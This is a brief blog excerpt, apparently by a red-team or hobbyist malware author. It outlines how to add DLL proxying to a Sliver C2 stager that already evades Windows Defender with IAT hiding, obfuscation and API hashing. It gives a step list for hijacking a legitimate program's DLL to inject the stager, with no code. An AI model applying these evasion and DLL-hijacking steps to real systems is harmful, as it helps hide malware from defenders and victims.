To further weaponized my malware, i decided to implement a dll proxying as it is widely used by threat actors and it also gives alot of place for imagination and creativity. I will be continuing from where i left off with my Sliver C2 stager that I was injecting while bypassing windows defender by using a combination of techniques (IAT Hiding & Obfuscation, NT API Hashing). In hopes of making my attack a little bit more stealthier.
- Find a legitimate executable
- Find a dll used by a legitimate executable
- Identify exported functions
- Test it with a message box, while proxying
- Create your dll with your own implementation that will inject your stager
- Add the exported functions that will be redirected
- Test the functionnality
You can red my blog post about it